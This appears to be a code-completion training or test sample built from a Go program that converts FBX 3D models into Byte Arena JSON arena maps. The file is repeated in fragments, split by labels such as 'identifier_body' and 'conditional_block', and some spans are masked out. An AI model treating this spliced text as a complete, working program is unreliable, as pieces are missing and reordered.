polygon, err := polygonutils.EnsureWinding(polygonutils.CartesianSystemWinding.CCW, polygon)
if err != nil {
fmt.Println(err)
return mapcontainer.MapPolygon{}
}
points := make([]mapcontainer.MapPoint, 0)
for _, vec2 := range polygon {
points = append(points, mapcontainer.MapPoint{vec2.GetX(), vec2.GetY()})
}
return mapcontainer.MapPolygon{Points: points}
}
func getKeyForEdge(edge edgeType) string {
return fmt.Sprintf("%.5f_%.5f_%.5f_%.5f", edge[0][0], edge[0][1], edge[1][0], edge[1][1])
}
///////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////
type ModelNameCollection []string
func (c ModelNameCollection) Contains(search string) int {
for i, group := range c {
if strings.Contains(group, search) {
return i
}
}
return -1
}
func getNodeNames(i *fbxModel) ModelNameCollection {
var model *fbxModel = i
res := make(ModelNameCollection, 0)
for model != nil {
if model.name != "" {
res = append(res, model.name)
}
model = model.parent
}
return res
}
type ModelNameFunction struct {
Function string
Args json.RawMessage
Original string
}
func (c ModelNameCollection) GetFunctions() []ModelNameFunction {
funcs := make([]ModelNameFunction, 0)
r := regexp.MustCompile("^ba:([a-zA-Z]+)\\((.*?)\\)$")
for _, group := range c {
parts := strings.Split(group, "-")
for _, part := range parts {
if r.MatchString(part) {
matches := r.FindStringSubmatch(part)
funcs = append(funcs, ModelNameFunction{
Function: matches[1],
Args: json.RawMessage("[" + matches[2] + "]"),
Original: part,
})
}
}
}
return funcs
}
| {
return fmt.Sprintf("<vertex(%f, %f, %f)>", p[0], p[1], p[2])
} | identifier_body |
main.go | package main
import (
"bytes"
"encoding/json"
"flag"
"fmt"
"os"
"os/exec"
"regexp"
"runtime"
"sort"
"strconv"
"strings"
"time"
"github.com/go-gl/mathgl/mgl64"
"github.com/bytearena/core/common/types/mapcontainer"
"github.com/bytearena/core/common/utils/number"
polygonutils "github.com/bytearena/core/common/utils/polygon"
"github.com/bytearena/core/common/utils/vector"
)
const AxisX = 0
const AxisY = 1
const AxisZ = 2
// Blender Sign FBX Sign
// CoordAxis AxisX = 0 1 AxisX = 0 1
// UpAxis AxisZ = 2 1 AxisY = 1 1
// FrontAxis AxisY = 1 -1 AxisZ = 2 1
// => For blender, FrontAxis is 1 when pointing away from the camera, and -1 when pointing towards the camera; it's the opposite for FBX
// => yet blenders does not set the sign to -1 on FrontAxis when exporting; see https://developer.blender.org/T43935 ?
// (1,0,0) (1,0,0)
// (0,1,0) (0,0,-1)
// (0,0,1) (0,1,0)
// => -z (fbx) becomes y (corrected vertice)
// => y (fbx) becomes z
func fixCoordSystem(p vertexType) vertexType {
return vertexType{
p[0],
-1.0 * p[2],
p[1],
}
}
func main() {
var fbxdumpCmd string
switch runtime.GOOS {
case "darwin":
{
fbxdumpCmd = "./bin/fbxdump-macos"
}
case "linux":
{
fbxdumpCmd = "./bin/fbxdump-linux"
}
default:
{
fmt.Println("map-builder-fbx may be used only on linux or macos")
os.Exit(1)
}
}
sourcefilepath := flag.String("in", "", "Input fbx file; required")
flag.Parse()
if *sourcefilepath == "" {
fmt.Println("--in is required; ex: --in ~/map.fbx")
os.Exit(1)
}
stderr := &bytes.Buffer{}
stdout := &bytes.Buffer{}
cmd := exec.Command(
fbxdumpCmd,
*sourcefilepath,
)
cmd.Env = nil
cmd.Stdin = os.Stdin
cmd.Stdout = stdout
cmd.Stderr = stderr
err := cmd.Run()
if err != nil {
fmt.Println("Error: error during fbxdump; " + stderr.String())
os.Exit(1)
}
// fmt.Println(stdout)
// os.Exit(0)
geometries := make(map[int64]*fbxGeometry)
models := make(map[int64]*fbxModel)
var f map[string]json.RawMessage
json.Unmarshal(stdout.Bytes(), &f)
var topchildren []marshChild
json.Unmarshal(f["children"], &topchildren)
scene := fbxScene{}
for _, topchild := range topchildren {
if topchild.Name == "GlobalSettings" {
var children2 []marshChild
json.Unmarshal(topchild.Children, &children2)
for _, child2 := range children2 {
if child2.Name == "Properties70" {
var children3 []marshChild
json.Unmarshal(child2.Children, &children3)
for _, child3 := range children3 {
if child3.Name == "P" {
var propname string
json.Unmarshal(child3.Properties[0].Value, &propname)
var valuePointer *int
switch propname {
case "UpAxis":
valuePointer = &scene.upAxis
case "UpAxisSign":
valuePointer = &scene.upAxisSign
case "FrontAxis":
valuePointer = &scene.frontAxis
case "FrontAxisSign":
valuePointer = &scene.frontAxisSign
case "CoordAxis":
valuePointer = &scene.coordsAxis
case "CoordAxisSign":
valuePointer = &scene.coordsAxisSign
default:
continue
}
var value int
json.Unmarshal(child3.Properties[4].Value, &value)
*valuePointer = value
}
}
}
}
}
if topchild.Name == "Objects" {
var children2 []marshChild
json.Unmarshal(topchild.Children, &children2)
for _, child2 := range children2 {
if child2.Name == "Geometry" {
geometry := fbxGeometry{}
json.Unmarshal(child2.Properties[0].Value, &geometry.id)
json.Unmarshal(child2.Properties[1].Value, &geometry.name)
// cut name up to \null
geometry.name = strings.Split(geometry.name, "\x00")[0]
var children3 []marshChild
json.Unmarshal(child2.Children, &children3)
for _, child3 := range children3 {
if child3.Name == "Vertices" {
json.Unmarshal(child3.Properties[0].Value, &geometry.vertices)
}
if child3.Name == "PolygonVertexIndex" {
json.Unmarshal(child3.Properties[0].Value, &geometry.indices)
if len(geometry.indices) > 0 {
poly := make(faceType, 0)
for _, geometryIndex := range geometry.indices {
endPoly := false
if geometryIndex < 0 {
// https://www.scratchapixel.com/lessons/3d-basic-rendering/introduction-polygon-mesh/polygon-mesh-file-formats
geometryIndex = geometryIndex*-1 - 1
endPoly = true
}
offset := geometryIndex * 3
p := vertexType{geometry.vertices[offset+0], geometry.vertices[offset+1], geometry.vertices[offset+2]}
poly = append(poly, fixCoordSystem(p))
if endPoly {
geometry.faces = append(geometry.faces, poly)
poly = make(faceType, 0)
}
}
if len(poly) > 0 {
geometry.faces = append(geometry.faces, poly)
}
} else {
poly := make(faceType, 0)
for i := 0; i < len(geometry.vertices)/3; i++ {
offset := i * 3
p := vertexType{geometry.vertices[offset+0], geometry.vertices[offset+1], geometry.vertices[offset+2]}
poly = append(poly, fixCoordSystem(p))
}
geometry.faces = append(geometry.faces, poly)
}
}
}
geometries[geometry.id] = &geometry
} else if child2.Name == "Model" {
model := fbxModel{}
json.Unmarshal(child2.Properties[0].Value, &model.id)
json.Unmarshal(child2.Properties[1].Value, &model.name)
// cut name up to \null
model.name = strings.Split(model.name, "\x00")[0]
var children3 []marshChild
json.Unmarshal(child2.Children, &children3)
for _, child3 := range children3 {
if child3.Name == "Properties70" {
//json.Unmarshal(child3.Properties[0].Value, &geometry.vertices)
transform := fbxTransform{}
var children4 []marshChild
json.Unmarshal(child3.Children, &children4)
for _, child4 := range children4 {
if len(child4.Properties) != 7 {
// always 7 properties on a transform aspect child; example:
// "properties": [
// { "type": "S", "value": "Lcl Translation" },
// { "type": "S", "value": "Lcl Translation" },
// { "type": "S", "value": "" },
// { "type": "S", "value": "A" },
// { "type": "D", "value": 407.526001 },
// { "type": "D", "value": 578.080200 },
// { "type": "D", "value": 25.511261 }
// ]
continue
}
var kind string
json.Unmarshal(child4.Properties[0].Value, &kind)
switch kind {
case "Lcl Translation":
{ // position (local translation)
json.Unmarshal(child4.Properties[4].Value, &transform.translation[0])
json.Unmarshal(child4.Properties[5].Value, &transform.translation[1])
json.Unmarshal(child4.Properties[6].Value, &transform.translation[2])
transform.translation = fixCoordSystem(transform.translation)
}
case "Lcl Rotation":
{ // position (local rotation)
json.Unmarshal(child4.Properties[4].Value, &transform.rotation[0])
json.Unmarshal(child4.Properties[5].Value, &transform.rotation[1])
json.Unmarshal(child4.Properties[6].Value, &transform.rotation[2])
transform.rotation = fixCoordSystem(transform.rotation)
}
case "Lcl Scaling":
{ // position (local scaling)
json.Unmarshal(child4.Properties[4].Value, &transform.scaling[0])
json.Unmarshal(child4.Properties[5].Value, &transform.scaling[1])
json.Unmarshal(child4.Properties[6].Value, &transform.scaling[2])
transform.scaling = fixCoordSystem(transform.scaling)
}
}
}
model.transform = transform
}
}
models[model.id] = &model
}
}
}
}
for _, topchild := range topchildren {
if topchild.Name != "Connections" {
continue
}
var children2 []marshChild
json.Unmarshal(topchild.Children, &children2)
for _, child2 := range children2 {
if child2.Name != "C" {
continue
}
var idOne int64
var idTwo int64
json.Unmarshal(child2.Properties[1].Value, &idOne)
json.Unmarshal(child2.Properties[2].Value, &idTwo)
// Si idOne => model && idTwo empty => model sans parent
// si idOne => geometry && idTwo model => idTwo.geometry = idOne
// si idOne => model && idTwo model => idOne.parent = idTwo
_, idOneIsModel := models[idOne]
_, idOneIsGeometry := geometries[idOne]
idTwoIsEmpty := idTwo == 0
_, idTwoIsModel := models[idTwo]
if idOneIsModel && idTwoIsEmpty {
modelOne, _ := models[idOne]
modelOne.parent = nil
} else if idOneIsGeometry && idTwoIsModel {
geometryOne, _ := geometries[idOne]
modelTwo, _ := models[idTwo]
modelTwo.geometry = geometryOne
} else if idOneIsModel && idTwoIsModel {
modelOne, _ := models[idOne]
modelTwo, _ := models[idTwo]
modelOne.parent = modelTwo
modelTwo.children = append(modelTwo.children, modelOne)
}
}
}
modelsObstacle := make([]*fbxModel, 0)
modelsGround := make([]*fbxModel, 0)
modelsStart := make([]*fbxModel, 0)
for _, model := range models {
if model.geometry == nil {
continue
}
modelnames := getNodeNames(model)
if modelnames.Contains("ba:obstacle") > -1 {
modelsObstacle = append(modelsObstacle, model)
}
if modelnames.Contains("ba:ground") > -1 {
modelsGround = append(modelsGround, model)
}
if modelnames.Contains("ba:start") > -1 {
modelsStart = append(modelsStart, model)
}
}
grounds := make([]mapcontainer.MapGround, 0)
obstacles := make([]mapcontainer.MapObstacleObject, 0)
starts := make([]mapcontainer.MapStart, 0)
for _, model := range modelsObstacle {
//fmt.Println("# " + model.name)
obstacles = append(obstacles, mapcontainer.MapObstacleObject{
Id: strconv.Itoa(int(model.id)),
Name: model.name,
Polygon: polygonFrom2DMesh(
model.geometry.getTransformedFaces(model.getFullTransform()),
),
})
}
for _, model := range modelsGround {
//fmt.Println("# " + model.name)
grounds = append(grounds, mapcontainer.MapGround{
Id: strconv.Itoa(int(model.id)),
Name: model.name,
Polygon: polygonFrom2DMesh(
model.geometry.getTransformedFaces(model.getFullTransform()),
),
})
}
for _, start := range modelsStart {
origin := vertexType{0, 0, 0}.applyTransform(start.getFullTransform())
starts = append(starts, mapcontainer.MapStart{
Id: strconv.Itoa(int(start.id)),
Name: start.name,
Point: mapcontainer.MapPoint{
origin[0],
origin[1],
},
})
}
builtmap := mapcontainer.MapContainer{}
builtmap.Meta.Readme = "Byte Arena Map"
builtmap.Meta.Kind = "deathmatch"
builtmap.Meta.MaxContestants = len(starts)
builtmap.Meta.Date = time.Now().Format(time.RFC3339)
builtmap.Data.Grounds = grounds
builtmap.Data.Starts = starts
builtmap.Data.Obstacles = obstacles
bjsonmap, _ := json.MarshalIndent(builtmap, "", " ")
fmt.Println(string(bjsonmap))
}
func debugPolygonSVG(polygon []vector.Vector2) {
fmt.Println("<svg height='700' width='500'><g transform='translate(700,350) scale(4)'>")
for i := 0; i < len(polygon); i++ {
nextIndex := 0
if i == len(polygon)-1 {
nextIndex = 0
} else {
nextIndex = i + 1
}
a := polygon[i]
b := polygon[nextIndex]
fmt.Println(fmt.Sprintf("<line title='Edge #%d' x1=\"%f\" y1=\"%f\" x2=\"%f\" y2=\"%f\" style=\"stroke: black; stroke-width: 0.1;\" />", i+1, a.GetX()*10, a.GetY()*10, b.GetX()*10, b.GetY()*10))
}
fmt.Println("</g></svg>")
}
type vertexType [3]float64
type edgeType [2]vertexType
type faceType []vertexType
func (a vertexType) Equals(b vertexType) bool {
return number.FloatEquals(a[0], b[0]) && number.FloatEquals(a[1], b[1]) && number.FloatEquals(a[2], b[2])
}
func (p vertexType) String() string {
return fmt.Sprintf("<vertex(%f, %f, %f)>", p[0], p[1], p[2])
}
func (p vertexType) applyTransform(transform mgl64.Mat4) vertexType {
res := mgl64.TransformCoordinate(
mgl64.Vec3{
p[0],
p[1],
p[2],
},
transform,
)
return vertexType{
res.X(),
res.Y(),
res.Z(),
}
}
func (a edgeType) Equals(b edgeType) bool {
return a[0].Equals(b[0]) && a[1].Equals(b[1]) || a[1].Equals(b[0]) && a[0].Equals(b[1])
}
func (face faceType) GetEdges() []edgeType {
edges := make([]edgeType, 0)
for i := 0; i < len(face); i++ {
nextIndex := i + 1
if i == len(face)-1 {
nextIndex = 0
}
edges = append(edges, edgeType{face[i], face[nextIndex]})
}
return edges
}
func (poly faceType) applyTransform(transform mgl64.Mat4) faceType {
res := make(faceType, len(poly))
for i, p := range poly {
res[i] = p.applyTransform(transform)
}
return res
}
type fbxScene struct {
upAxis int
upAxisSign int
frontAxis int
frontAxisSign int
coordsAxis int
coordsAxisSign int
}
type fbxTransform struct {
translation vertexType
rotation vertexType
scaling vertexType
}
type fbxModel struct {
parent *fbxModel
children []*fbxModel
id int64
name string
transform fbxTransform
geometry *fbxGeometry
}
func (model *fbxModel) getFullTransform() mgl64.Mat4 {
// ordre : local -> global
mats := make([]mgl64.Mat4, 0)
mats = append(mats, mgl64.Scale3D(0.01, 0.01, 0.01))
current := model
for current != nil {
var scale mgl64.Mat4
if current.transform.scaling[0] == 0.0 && current.transform.scaling[1] == 0.0 && current.transform.scaling[2] == 0.0 {
scale = mgl64.Scale3D(1, 1, 1)
} else {
scale = mgl64.Scale3D(current.transform.scaling[0], current.transform.scaling[1], current.transform.scaling[2])
}
rotx := mgl64.HomogRotate3DX(mgl64.DegToRad(current.transform.rotation[0]))
roty := mgl64.HomogRotate3DY(mgl64.DegToRad(current.transform.rotation[1]))
rotz := mgl64.HomogRotate3DZ(mgl64.DegToRad(current.transform.rotation[2]))
trans := mgl64.Translate3D(current.transform.translation[0]/100.0, current.transform.translation[1]/100.0, current.transform.translation[2]/100.0)
mat := mgl64.Ident4().
Mul4(trans).
Mul4(rotz).
Mul4(roty).
Mul4(rotx).
Mul4(scale)
mats = append(mats, mat)
current = current.parent
}
mat := mgl64.Ident4()
for i := len(mats) - 1; i >= 0; i-- {
mat = mat.Mul4(mats[i])
}
return mat
}
type fbxGeometry struct {
id int64
name string
vertices []float64
indices []int
faces []faceType
}
func (g *fbxGeometry) getTransformedFaces(transform mgl64.Mat4) []faceType {
res := make([]faceType, len(g.faces))
for i, face := range g.faces {
res[i] = face.applyTransform(transform)
}
return res
}
type marshChild struct {
Name string `json:"name"`
Children json.RawMessage `json:"children"`
Properties []marshProperty `json:"properties"`
}
type marshProperty struct {
Type string `json:"type"`
Value json.RawMessage `json:"value"`
}
///////////////////////////////////////////////////////////////////////////////
func makeSortedEdge(a, b vertexType) edgeType {
var min, max = a, b
if min[0] > max[0] {
max, min = min, max
} else if min[0] == max[0] && min[1] > max[1] {
max, min = min, max
} else if min[0] == max[0] && min[1] == max[1] && min[2] > max[2] {
max, min = min, max
}
return edgeType{
min,
max,
}
}
func polygonFrom2DMesh(faces []faceType) mapcontainer.MapPolygon {
edges := make([]edgeType, 0)
polygon := make([]vector.Vector2, 0)
for _, face := range faces {
edges = append(edges, face.GetEdges()...)
}
// sort edges
sortedEdges := make([]edgeType, len(edges))
for i, edge := range edges {
sortedEdges[i] = makeSortedEdge(edge[0], edge[1])
}
type edgecount struct {
count int
edge edgeType
}
countedEdges := make(map[string]*edgecount)
for _, edge := range sortedEdges {
hash := getKeyForEdge(edge)
//fmt.Println("HASH", hash)
_, ok := countedEdges[hash]
if !ok {
countedEdges[hash] = &edgecount{
count: 1,
edge: edge,
}
} else {
countedEdges[hash].count++
}
}
//spew.Dump(points)
//spew.Dump(countedEdges)
outlineEdges := make([]edgeType, 0)
// stabilizing map iteration (easier for debug)
var countedEdgesKeys []string
for k := range countedEdges {
countedEdgesKeys = append(countedEdgesKeys, k)
}
sort.Strings(countedEdgesKeys)
for _, countedEdgeKey := range countedEdgesKeys {
countedEdge := countedEdges[countedEdgeKey]
if countedEdge.count == 1 {
outlineEdges = append(outlineEdges, countedEdge.edge)
}
}
if len(outlineEdges) == 0 {
return mapcontainer.MapPolygon{}
}
/////////////////////////////////////////////////////////////
// putting edges in the right order for the polygon
/////////////////////////////////////////////////////////////
outline := make([]edgeType, 0)
// taking the leftmost point as a starting point
var leftMostEdge *edgeType
for _, edge := range outlineEdges {
if leftMostEdge == nil || leftMostEdge[0][0] > edge[0][0] {
leftMostEdge = &edge
}
}
outline = append(outline, *leftMostEdge)
done := false
for i := 1; i < len(outlineEdges); i++ {
head := outline[i-1]
found := false
for _, edge := range outlineEdges {
if head.Equals(edge) {
continue
}
if head[1].Equals(edge[0]) {
outline = append(outline, edge)
found = true
done = edge.Equals(outline[0])
break
} else if head[1].Equals(edge[1]) {
// swap edge points
edge[0], edge[1] = edge[1], edge[0]
outline = append(outline, edge)
found = true
done = edge.Equals(outline[0])
break
}
}
if !found {
fmt.Println("Next edge not found in outlinesFrom2DMesh for", head, outlineEdges)
//os.Exit(1)
break
}
if done {
break
}
}
// /////////////////////////////////////////////////////////////
// /////////////////////////////////////////////////////////////
// // convert edges to points (vector2)
for _, edge := range outline {
polygon = append(polygon, vector.MakeVector2(edge[0][0], edge[0][1]))
}
// // ensure winding
polygon, err := polygonutils.EnsureWinding(polygonutils.CartesianSystemWinding.CCW, polygon)
if err != nil |
points := make([]mapcontainer.MapPoint, 0)
for _, vec2 := range polygon {
points = append(points, mapcontainer.MapPoint{vec2.GetX(), vec2.GetY()})
}
return mapcontainer.MapPolygon{Points: points}
}
func getKeyForEdge(edge edgeType) string {
return fmt.Sprintf("%.5f_%.5f_%.5f_%.5f", edge[0][0], edge[0][1], edge[1][0], edge[1][1])
}
///////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////
type ModelNameCollection []string
func (c ModelNameCollection) Contains(search string) int {
for i, group := range c {
if strings.Contains(group, search) {
return i
}
}
return -1
}
func getNodeNames(i *fbxModel) ModelNameCollection {
var model *fbxModel = i
res := make(ModelNameCollection, 0)
for model != nil {
if model.name != "" {
res = append(res, model.name)
}
model = model.parent
}
return res
}
type ModelNameFunction struct {
Function string
Args json.RawMessage
Original string
}
func (c ModelNameCollection) GetFunctions() []ModelNameFunction {
funcs := make([]ModelNameFunction, 0)
r := regexp.MustCompile("^ba:([a-zA-Z]+)\\((.*?)\\)$")
for _, group := range c {
parts := strings.Split(group, "-")
for _, part := range parts {
if r.MatchString(part) {
matches := r.FindStringSubmatch(part)
funcs = append(funcs, ModelNameFunction{
Function: matches[1],
Args: json.RawMessage("[" + matches[2] + "]"),
Original: part,
})
}
}
}
return funcs
}
| {
fmt.Println(err)
return mapcontainer.MapPolygon{}
} | conditional_block |
main.go | package main
import (
"bytes"
"encoding/json"
"flag"
"fmt"
"os"
"os/exec"
"regexp"
"runtime"
"sort"
"strconv"
"strings"
"time"
"github.com/go-gl/mathgl/mgl64"
"github.com/bytearena/core/common/types/mapcontainer"
"github.com/bytearena/core/common/utils/number"
polygonutils "github.com/bytearena/core/common/utils/polygon"
"github.com/bytearena/core/common/utils/vector"
)
const AxisX = 0
const AxisY = 1
const AxisZ = 2
// Blender Sign FBX Sign
// CoordAxis AxisX = 0 1 AxisX = 0 1
// UpAxis AxisZ = 2 1 AxisY = 1 1
// FrontAxis AxisY = 1 -1 AxisZ = 2 1
// => For blender, FrontAxis is 1 when pointing away from the camera, and -1 when pointing towards the camera; it's the opposite for FBX
// => yet blenders does not set the sign to -1 on FrontAxis when exporting; see https://developer.blender.org/T43935 ?
// (1,0,0) (1,0,0)
// (0,1,0) (0,0,-1)
// (0,0,1) (0,1,0)
// => -z (fbx) becomes y (corrected vertice)
// => y (fbx) becomes z
func fixCoordSystem(p vertexType) vertexType {
return vertexType{
p[0],
-1.0 * p[2],
p[1],
}
}
func main() {
var fbxdumpCmd string
switch runtime.GOOS {
case "darwin":
{
fbxdumpCmd = "./bin/fbxdump-macos"
}
case "linux":
{
fbxdumpCmd = "./bin/fbxdump-linux"
}
default:
{
fmt.Println("map-builder-fbx may be used only on linux or macos")
os.Exit(1)
}
}
sourcefilepath := flag.String("in", "", "Input fbx file; required")
flag.Parse()
if *sourcefilepath == "" {
fmt.Println("--in is required; ex: --in ~/map.fbx")
os.Exit(1)
}
stderr := &bytes.Buffer{}
stdout := &bytes.Buffer{}
cmd := exec.Command(
fbxdumpCmd,
*sourcefilepath,
)
cmd.Env = nil
cmd.Stdin = os.Stdin
cmd.Stdout = stdout
cmd.Stderr = stderr
err := cmd.Run()
if err != nil {
fmt.Println("Error: error during fbxdump; " + stderr.String())
os.Exit(1)
}
// fmt.Println(stdout)
// os.Exit(0)
geometries := make(map[int64]*fbxGeometry)
models := make(map[int64]*fbxModel)
var f map[string]json.RawMessage
json.Unmarshal(stdout.Bytes(), &f)
var topchildren []marshChild
json.Unmarshal(f["children"], &topchildren)
scene := fbxScene{}
for _, topchild := range topchildren {
if topchild.Name == "GlobalSettings" {
var children2 []marshChild
json.Unmarshal(topchild.Children, &children2)
for _, child2 := range children2 {
if child2.Name == "Properties70" {
var children3 []marshChild
json.Unmarshal(child2.Children, &children3)
for _, child3 := range children3 {
if child3.Name == "P" {
var propname string
json.Unmarshal(child3.Properties[0].Value, &propname)
var valuePointer *int
switch propname {
case "UpAxis":
valuePointer = &scene.upAxis
case "UpAxisSign":
valuePointer = &scene.upAxisSign
case "FrontAxis":
valuePointer = &scene.frontAxis
case "FrontAxisSign":
valuePointer = &scene.frontAxisSign
case "CoordAxis":
valuePointer = &scene.coordsAxis
case "CoordAxisSign":
valuePointer = &scene.coordsAxisSign
default:
continue
}
var value int
json.Unmarshal(child3.Properties[4].Value, &value)
*valuePointer = value
}
}
}
}
}
if topchild.Name == "Objects" {
var children2 []marshChild
json.Unmarshal(topchild.Children, &children2)
for _, child2 := range children2 {
if child2.Name == "Geometry" {
geometry := fbxGeometry{}
json.Unmarshal(child2.Properties[0].Value, &geometry.id)
json.Unmarshal(child2.Properties[1].Value, &geometry.name)
// cut name up to \null
geometry.name = strings.Split(geometry.name, "\x00")[0]
var children3 []marshChild
json.Unmarshal(child2.Children, &children3)
for _, child3 := range children3 {
if child3.Name == "Vertices" {
json.Unmarshal(child3.Properties[0].Value, &geometry.vertices)
}
if child3.Name == "PolygonVertexIndex" {
json.Unmarshal(child3.Properties[0].Value, &geometry.indices)
if len(geometry.indices) > 0 {
poly := make(faceType, 0)
for _, geometryIndex := range geometry.indices {
endPoly := false
if geometryIndex < 0 {
// https://www.scratchapixel.com/lessons/3d-basic-rendering/introduction-polygon-mesh/polygon-mesh-file-formats
geometryIndex = geometryIndex*-1 - 1
endPoly = true
}
offset := geometryIndex * 3
p := vertexType{geometry.vertices[offset+0], geometry.vertices[offset+1], geometry.vertices[offset+2]}
poly = append(poly, fixCoordSystem(p))
if endPoly {
geometry.faces = append(geometry.faces, poly)
poly = make(faceType, 0)
}
}
if len(poly) > 0 {
geometry.faces = append(geometry.faces, poly)
}
} else {
poly := make(faceType, 0)
for i := 0; i < len(geometry.vertices)/3; i++ {
offset := i * 3
p := vertexType{geometry.vertices[offset+0], geometry.vertices[offset+1], geometry.vertices[offset+2]}
poly = append(poly, fixCoordSystem(p))
}
geometry.faces = append(geometry.faces, poly)
}
}
}
geometries[geometry.id] = &geometry
} else if child2.Name == "Model" {
model := fbxModel{}
json.Unmarshal(child2.Properties[0].Value, &model.id)
json.Unmarshal(child2.Properties[1].Value, &model.name)
// cut name up to \null
model.name = strings.Split(model.name, "\x00")[0]
var children3 []marshChild
json.Unmarshal(child2.Children, &children3)
for _, child3 := range children3 {
if child3.Name == "Properties70" {
//json.Unmarshal(child3.Properties[0].Value, &geometry.vertices)
transform := fbxTransform{}
var children4 []marshChild
json.Unmarshal(child3.Children, &children4)
for _, child4 := range children4 {
if len(child4.Properties) != 7 {
// always 7 properties on a transform aspect child; example:
// "properties": [
// { "type": "S", "value": "Lcl Translation" },
// { "type": "S", "value": "Lcl Translation" },
// { "type": "S", "value": "" },
// { "type": "S", "value": "A" },
// { "type": "D", "value": 407.526001 },
// { "type": "D", "value": 578.080200 },
// { "type": "D", "value": 25.511261 }
// ]
continue
}
var kind string
json.Unmarshal(child4.Properties[0].Value, &kind)
switch kind {
case "Lcl Translation":
{ // position (local translation)
json.Unmarshal(child4.Properties[4].Value, &transform.translation[0])
json.Unmarshal(child4.Properties[5].Value, &transform.translation[1])
json.Unmarshal(child4.Properties[6].Value, &transform.translation[2])
transform.translation = fixCoordSystem(transform.translation)
}
case "Lcl Rotation":
{ // position (local rotation)
json.Unmarshal(child4.Properties[4].Value, &transform.rotation[0])
json.Unmarshal(child4.Properties[5].Value, &transform.rotation[1])
json.Unmarshal(child4.Properties[6].Value, &transform.rotation[2])
transform.rotation = fixCoordSystem(transform.rotation)
}
case "Lcl Scaling":
{ // position (local scaling)
json.Unmarshal(child4.Properties[4].Value, &transform.scaling[0])
json.Unmarshal(child4.Properties[5].Value, &transform.scaling[1])
json.Unmarshal(child4.Properties[6].Value, &transform.scaling[2])
transform.scaling = fixCoordSystem(transform.scaling)
}
}
}
model.transform = transform
}
}
models[model.id] = &model
}
}
}
}
for _, topchild := range topchildren {
if topchild.Name != "Connections" {
continue
}
var children2 []marshChild
json.Unmarshal(topchild.Children, &children2)
for _, child2 := range children2 {
if child2.Name != "C" {
continue
}
var idOne int64
var idTwo int64
json.Unmarshal(child2.Properties[1].Value, &idOne)
json.Unmarshal(child2.Properties[2].Value, &idTwo)
// Si idOne => model && idTwo empty => model sans parent
// si idOne => geometry && idTwo model => idTwo.geometry = idOne
// si idOne => model && idTwo model => idOne.parent = idTwo
_, idOneIsModel := models[idOne]
_, idOneIsGeometry := geometries[idOne]
idTwoIsEmpty := idTwo == 0
_, idTwoIsModel := models[idTwo]
if idOneIsModel && idTwoIsEmpty {
modelOne, _ := models[idOne]
modelOne.parent = nil
} else if idOneIsGeometry && idTwoIsModel {
geometryOne, _ := geometries[idOne]
modelTwo, _ := models[idTwo]
modelTwo.geometry = geometryOne
} else if idOneIsModel && idTwoIsModel {
modelOne, _ := models[idOne]
modelTwo, _ := models[idTwo]
modelOne.parent = modelTwo
modelTwo.children = append(modelTwo.children, modelOne)
}
}
}
modelsObstacle := make([]*fbxModel, 0)
modelsGround := make([]*fbxModel, 0)
modelsStart := make([]*fbxModel, 0)
for _, model := range models {
if model.geometry == nil {
continue
}
modelnames := getNodeNames(model)
if modelnames.Contains("ba:obstacle") > -1 {
modelsObstacle = append(modelsObstacle, model)
}
if modelnames.Contains("ba:ground") > -1 {
modelsGround = append(modelsGround, model)
}
if modelnames.Contains("ba:start") > -1 {
modelsStart = append(modelsStart, model)
}
}
grounds := make([]mapcontainer.MapGround, 0)
obstacles := make([]mapcontainer.MapObstacleObject, 0)
starts := make([]mapcontainer.MapStart, 0)
for _, model := range modelsObstacle {
//fmt.Println("# " + model.name)
obstacles = append(obstacles, mapcontainer.MapObstacleObject{
Id: strconv.Itoa(int(model.id)),
Name: model.name,
Polygon: polygonFrom2DMesh(
model.geometry.getTransformedFaces(model.getFullTransform()),
),
})
}
for _, model := range modelsGround {
//fmt.Println("# " + model.name)
grounds = append(grounds, mapcontainer.MapGround{
Id: strconv.Itoa(int(model.id)),
Name: model.name,
Polygon: polygonFrom2DMesh(
model.geometry.getTransformedFaces(model.getFullTransform()),
),
})
}
for _, start := range modelsStart {
origin := vertexType{0, 0, 0}.applyTransform(start.getFullTransform())
starts = append(starts, mapcontainer.MapStart{
Id: strconv.Itoa(int(start.id)),
Name: start.name,
Point: mapcontainer.MapPoint{
origin[0],
origin[1],
},
})
}
builtmap := mapcontainer.MapContainer{}
builtmap.Meta.Readme = "Byte Arena Map"
builtmap.Meta.Kind = "deathmatch"
builtmap.Meta.MaxContestants = len(starts)
builtmap.Meta.Date = time.Now().Format(time.RFC3339)
builtmap.Data.Grounds = grounds
builtmap.Data.Starts = starts
builtmap.Data.Obstacles = obstacles
bjsonmap, _ := json.MarshalIndent(builtmap, "", " ")
fmt.Println(string(bjsonmap))
}
func | (polygon []vector.Vector2) {
fmt.Println("<svg height='700' width='500'><g transform='translate(700,350) scale(4)'>")
for i := 0; i < len(polygon); i++ {
nextIndex := 0
if i == len(polygon)-1 {
nextIndex = 0
} else {
nextIndex = i + 1
}
a := polygon[i]
b := polygon[nextIndex]
fmt.Println(fmt.Sprintf("<line title='Edge #%d' x1=\"%f\" y1=\"%f\" x2=\"%f\" y2=\"%f\" style=\"stroke: black; stroke-width: 0.1;\" />", i+1, a.GetX()*10, a.GetY()*10, b.GetX()*10, b.GetY()*10))
}
fmt.Println("</g></svg>")
}
type vertexType [3]float64
type edgeType [2]vertexType
type faceType []vertexType
func (a vertexType) Equals(b vertexType) bool {
return number.FloatEquals(a[0], b[0]) && number.FloatEquals(a[1], b[1]) && number.FloatEquals(a[2], b[2])
}
func (p vertexType) String() string {
return fmt.Sprintf("<vertex(%f, %f, %f)>", p[0], p[1], p[2])
}
func (p vertexType) applyTransform(transform mgl64.Mat4) vertexType {
res := mgl64.TransformCoordinate(
mgl64.Vec3{
p[0],
p[1],
p[2],
},
transform,
)
return vertexType{
res.X(),
res.Y(),
res.Z(),
}
}
func (a edgeType) Equals(b edgeType) bool {
return a[0].Equals(b[0]) && a[1].Equals(b[1]) || a[1].Equals(b[0]) && a[0].Equals(b[1])
}
func (face faceType) GetEdges() []edgeType {
edges := make([]edgeType, 0)
for i := 0; i < len(face); i++ {
nextIndex := i + 1
if i == len(face)-1 {
nextIndex = 0
}
edges = append(edges, edgeType{face[i], face[nextIndex]})
}
return edges
}
func (poly faceType) applyTransform(transform mgl64.Mat4) faceType {
res := make(faceType, len(poly))
for i, p := range poly {
res[i] = p.applyTransform(transform)
}
return res
}
type fbxScene struct {
upAxis int
upAxisSign int
frontAxis int
frontAxisSign int
coordsAxis int
